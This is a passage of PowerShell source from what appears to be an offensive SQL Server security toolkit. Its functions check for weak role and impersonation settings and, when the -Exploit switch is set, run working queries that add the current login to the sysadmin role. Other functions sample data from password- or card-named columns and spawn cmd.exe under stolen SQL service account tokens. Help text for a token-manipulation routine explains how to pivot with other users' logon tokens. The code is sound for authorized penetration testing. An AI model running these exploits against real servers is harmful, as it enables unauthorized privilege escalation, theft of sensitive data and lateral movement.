ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_DDLAMDIN" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED" Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN" Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' $CurrentLoginRoles | ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'DATABASE ROLE - DB_DDLADMIN' $Description = 'The login has the DB_DDLADMIN role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin, or if a custom assembly can be loaded.' $Remediation = "If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser'" $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'No exploit command is available at this time, but a custom assesmbly could be used.' $Details = '' $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted. Or it must be possible to load a custom assembly configured for external access.' $Reference = 'https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Iterate through each current login and their associated roles $CurrentPrincpalList| ForEach-Object -Process { # Check if login or role has the DB_DDLADMIN roles in any databases $DBDDLADMIN = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_DDLADMIN -PrincipalName $_ -SuppressVerbose # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # Check for db ownerships if($DBDDLADMIN) { # Add an entry for each database where the user has the DB_DDLADMIN role $DBDDLADMIN| ForEach-Object -Process { $DatabaseTarget = $_.DatabaseName $PrincipalTarget = $_.PrincipalName Write-Verbose -Message "$Instance : - $PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." $IsVulnerable = 'Yes' # Check if associated database is trusted and the owner is a sysadmin $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript { $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1 } if($Depends) { $IsExploitable = 'No' Write-Verbose -Message "$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable." # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- if($Exploit) { # Check if user is already a sysadmin $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status if($SysadminPreCheck -eq 0) { # Status user Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions..." # Attempt to add the current login to sysadmins fixed server role $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert" -SuppressVerbose # Verify the login was added successfully $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status if($SysadminPostCheck -eq 1) { Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" $Exploited = 'Yes' } else { } } else { Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." } #Add record $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } else { #Add record $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { #Add record Write-Verbose -Message "$Instance : - The $DatabaseTarget is not exploitable." $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database, but this was not exploitable." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } } } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # ----------------------------------- # Invoke-SQLAuditPrivImpersonateLogin # ----------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivImpersonateLogin { <# .SYNOPSIS Check if the current login has the IMPERSONATE permission on any sysadmin logins. Attempt to use permission to obtain sysadmin privileges. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER NoOutput Don't output anything. .PARAMETER Exploit Exploit vulnerable issues .EXAMPLE PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : PERMISSION - IMPERSONATE LOGIN Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit Details : public can impersonate the sa SYSADMIN login. This test was ran with the evil login. Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! -Exploit ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : PERMISSION - IMPERSONATE LOGIN Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : Yes ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit Details : public can impersonate the sa SYSADMIN login. This test was ran with the evil login. Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Status user Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin # --------------------------------------------------------------- # Set function meta data for report output # --------------------------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Impersonate Login' $Description = 'The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges.' $Remediation = 'Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]' $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "Invoke-SQLAuditPrivImpersonateLogin -Instance $Instance -Exploit" $Details = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms181362.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # --------------------------------------------------------------- # Check for Vulnerability # --------------------------------------------------------------- # Get list of SQL Server logins that can be impersonated by the current login $ImpersonationList = Get-SQLServerPriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.PermissionName -like 'IMPERSONATE' } # Check if any SQL Server logins can be impersonated if($ImpersonationList) { # Status user Write-Verbose -Message "$Instance : - Logins can be impersonated." $IsVulnerable = 'Yes' # --------------------------------------------------------------- # Check if Vulnerability is Exploitable # --------------------------------------------------------------- # Iterate through each affected login and check if they are a sysadmin $ImpersonationList | ForEach-Object -Process { # Grab grantee and impersonable login $ImpersonatedLogin = $_.ObjectName $GranteeName = $_.GranteeName # Check if impersonable login is a sysadmin $ImpLoginSysadminStatus = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$ImpersonatedLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status If($ImpLoginSysadminStatus -eq 1) { #Status user Write-Verbose -Message "$Instance : - $GranteeName can impersonate the $ImpersonatedLogin sysadmin login." $IsExploitable = 'Yes' $Details = "$GranteeName can impersonate the $ImpersonatedLogin SYSADMIN login. This test was ran with the $CurrentLogin login." # --------------------------------------------------------------- # Exploit Vulnerability # --------------------------------------------------------------- if($Exploit) { # Status user Write-Verbose -Message "$Instance : - EXPLOITING: Starting exploit process..." # Check if user is already a sysadmin $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status if($SysadminPreCheck -eq 0) { # Status user Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by impersonating $ImpersonatedLogin..." # Attempt to add the current login to sysadmins fixed server role $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert" -SuppressVerbose # Verify the login was added successfully $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status if($SysadminPostCheck -eq 1) { Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" $Exploited = 'Yes' } else { Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." } } else { # Status user Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed." $Exploited = 'No' } } } else { # Status user Write-Verbose -Message "$Instance : - $GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin)." $Details = "$GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin). This test was ran with the $CurrentLogin login." $IsExploitable = 'No' } # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { # Status user Write-Verbose -Message "$Instance : - No logins could be impersonated." } # Status user Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditSampleDataByColumn # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditSampleDataByColumn { <# .SYNOPSIS Check if the current login can access any database columns that contain the word password. Supports column name keyword search and custom data sample size. Note: For cleaner data sample output use the Get-SQLColumnSampleData function. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER NoOutput Don't output anything. .PARAMETER Exploit Exploit vulnerable issues .PARAMETER SampleSize Number of records to sample. .PARAMETER Keyword Column name to search for. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\STANDARDDEV2014 -Keyword card -SampleSize 2 -Exploit ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Potentially Sensitive Columns Found Description : Columns were found in non default databases that may contain sensitive information. Remediation : Ensure that all passwords and senstive data are masked, hashed, or encrypted. Severity : Informational IsVulnerable : Yes IsExploitable : Yes Exploited : Yes ExploitCmd : Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\STANDARDDEV2014 -Exploit Details : Data sample from [testdb].[dbo].[tracking].[card] : "4111111111111111" "4111111111111112". Reference : https://msdn.microsoft.com/en-us/library/ms188348.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit, [Parameter(Mandatory = $false, HelpMessage = 'Number of records to sample.')] [int]$SampleSize = 1, [Parameter(Mandatory = $false, HelpMessage = ' Column name to search for.')] [string]$Keyword = 'Password' ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: SEARCH DATA BY COLUMN" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED" Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN" Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Potentially Sensitive Columns Found' $Description = 'Columns were found in non default databases that may contain sensitive information.' $Remediation = 'Ensure that all passwords and senstive data are masked, hashed, or encrypted.' $Severity = 'Informational' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "Invoke-SQLAuditSampleDataByColumn -Instance $Instance -Exploit" $Details = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms188348.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -ColumnNameSearch $Keyword -NoDefaults -SuppressVerbose if($Columns) { $IsVulnerable = 'Yes' } else { $IsVulnerable = 'No' } # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- if($IsVulnerable -eq 'Yes') { # List affected columns $Columns| ForEach-Object -Process { $DatabaseName = $_.DatabaseName $SchemaName = $_.SchemaName $TableName = $_.TableName $ColumnName = $_.ColumnName $AffectedColumn = "[$DatabaseName].[$SchemaName].[$TableName].[$ColumnName]" $AffectedTable = "[$DatabaseName].[$SchemaName].[$TableName]" $Query = "USE $DatabaseName; SELECT TOP $SampleSize [$ColumnName] FROM $AffectedTable " Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" # ------------------------------------------------------------------ # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role, get data # ------------------------------------------------------------------ if($IsVulnerable -eq 'Yes') { $TblTargetColumns | ForEach-Object -Process { # Add sample data Write-Verbose -Message "$Instance : - EXPLOITING: Selecting data sample from column $AffectedColumn." # Query for data $DataSample = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | ConvertTo-Csv -NoTypeInformation | Select-Object -Skip 1 if($DataSample) { $Details = "Data sample from $AffectedColumn : $DataSample." } else { $Details = "No data found in affected column: $AffectedColumn." } $IsExploitable = 'Yes' $Exploited = 'Yes' # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { # Add affected column list $Details = "Affected column: $AffectedColumn." $IsExploitable = 'Yes' $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } } else { Write-Verbose -Message "$Instance : - No columns were found that matched the search." } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLImpersonateServiceCmd # --------------------------------------- # Author: Scott Sutherland (Invoke-TokenManipulation wrapper) # Author: Joe Bialek (Invoke-TokenManipulation) Function Invoke-SQLImpersonateServiceCmd { <# .SYNOPSIS This function will download the Invoke-TokenManipulation function written by Joe Bialek and use it to impersonate local SQL Server service accounts in order to gain sysadmin privileges on local SQL Server instances. By default, the function will open a cmd.exe for all local services used by SQL Server. However, an alternative executable can also be provided (like ssms and PowerShell). Note1: This function requires local administrative or localsystem privileges. Note2: Currently, this function only supports local execution, but it can be run remotely via WMI or PowerShell remoting. .PARAMETER Instance SQL Server instance to connection to. If no instance is provided this script will open a seperate cmd.exe running in the context of each SQL Server service. .PARAMETER Exe Executable to run. .PARAMETER EngineOnly Only run command in the context of SQL Server database engine service accounts. .EXAMPLE This will pop up a cmd.exe console for every service used by SQL Server on the local system, and the cmd.exe will be running in the context of the associated service account. PS C:\> Invoke-SQLImpersonateServiceCmd .EXAMPLE This will pop up a cmd.exe consoles running as the SQL Server service accounts associated with the provided SQL Server instance. PS C:\> Get-SQLInstanceLocal | Invoke-SQLImpersonateServiceCmd -Verbose .EXAMPLE This will pop up a cmd.exe consoles running as the SQL Server service accounts associated with the provided SQL Server instance. the cmd.exe will be running in the context of the associated service account. PS C:\> Invoke-SQLImpersonateServiceCmd -Verbose -Instance SQLServer1\STANDARDDEV2014 .EXAMPLE This will run the provided powershell command as the SQL Server datbase engine service account associated with the provided instance. PS C:\> Invoke-SQLImpersonateServiceCmd -Verbose -Instance SQLServer1\STANDARDDEV2014 -EngineOnly -Exe 'PowerShell -c "notepad.exe"' #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Executable to run. Cmd.exe and Ssms.exe are recommended.')] [string]$Exe = 'cmd.exe', [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Only run commands in the context of SQL Server database engine service accounts.')] [switch]$EngineOnly ) Begin { # Check if the current process has elevated privs # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx Write-Verbose "Verifying local adminsitrator privileges..." $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator $IsAdmin = $prp.IsInRole($adm) if($IsAdmin){ Write-Verbose "The current user has local administrator privileges." }else{ Write-Verbose "The current user DOES NOT have local administrator privileges. Aborting." return } } Process { # Status user Write-Output "Note: The verbose flag will give you more info if you need it." # Get SQL services Write-Verbose "Gathering list of SQL Server services running locally..." if($EngineOnly){ $LocalSQLServices = Get-SQLServiceLocal -Instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Sort-Object Instance Write-Verbose "Only the database engine service accounts will be targeted." }else{ $LocalSQLServices = Get-SQLServiceLocal -Instance $Instance -RunOnly | Sort-Object Instance } # Get running processes Write-Verbose "Gathering list of local processes..." $LocalProcesses = Get-WmiObject -Class win32_process | Select-Object processid,ExecutablePath Write-Verbose "Targeting SQL Server processes..." # Grab SQL Service executable inforrmation $LocalSQLServices | ForEach-Object { $s_pathname = $_.ServicePath.Split("`"")[1] $s_displayname = $_.ServiceDisplayName $s_serviceaccount = $_.ServiceAccount $s_instance = $_.Instance # Grab process information $LocalProcesses | ForEach-Object { $p_ExecutablePath = $_.ExecutablePath $p_processid = $_.processid # Run executable as service account if($s_pathname -like "$p_ExecutablePath"){ Write-Output "$s_instance - Service: $s_displayname - Running command `"$Exe`" as $s_serviceaccount" # Setup command $MyCmd = "/C $Exe" # Run command Invoke-TokenManipulation -CreateProcess 'cmd.exe' -ProcessArgs $MyCmd -ProcessId $p_processid -ErrorAction SilentlyContinue # } } } } End { # Status user Write-Output "All done." } } #endregion ######################################################################### # #region THIRD PARTY FUNCTIONS # ######################################################################### # ------------------------------------------- # Function: Invoke-TokenManipulation # ------------------------------------------- # Author: Joe Bialek, Twitter: @JosephBialek function Invoke-TokenManipulation { <# .SYNOPSIS This script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use anothers users credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections. This functionality is very similar to the incognito tool (with some differences, and different use goals). This script can also make the PowerShell thread impersonate another users Logon Token. Unfortunately this doesn't work well, because PowerShell creates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token that one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect to another server as that user (it will authenticate using the primary token of the process, which is your original logon token). Because of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another users Logon Token, and then use this process to pivot. This works because the entire process is created using the other users Logon Token, so it will use their credentials for the authentication. IMPORTANT: If you are creating a process, by default this script will modify the ACL of the current users desktop to allow full control to "Everyone". This is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL is not permenant, as in, when the current logs off the ACL is cleared. It is still preferrable to not modify things unless they need to be modified though, so I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop. This could show up in logs depending on the level of monitoring. PERMISSIONS REQUIRED: SeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this. SeAssignPrimaryTokenPrivilege : Needed if launching a process while the script is running in Session 0. Important differences from incognito: First of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates between "Impersonation" and "Delegation" tokens. This is because incognito can be used in situations where you get remote code execution against a service which has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow you to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting without dumping credentials. In this situation, Impersonation vs Delegation does not matter because an administrator can turn any token in to a primary token (delegation rights). What does matter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for the user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types should have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks for tokens which were created with desirable logon tokens (and only displays them by default). In a nutshell, instead of worrying about "delegation vs impersonation" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good). PowerSploit Function: Invoke-TokenManipulation Author: Joe 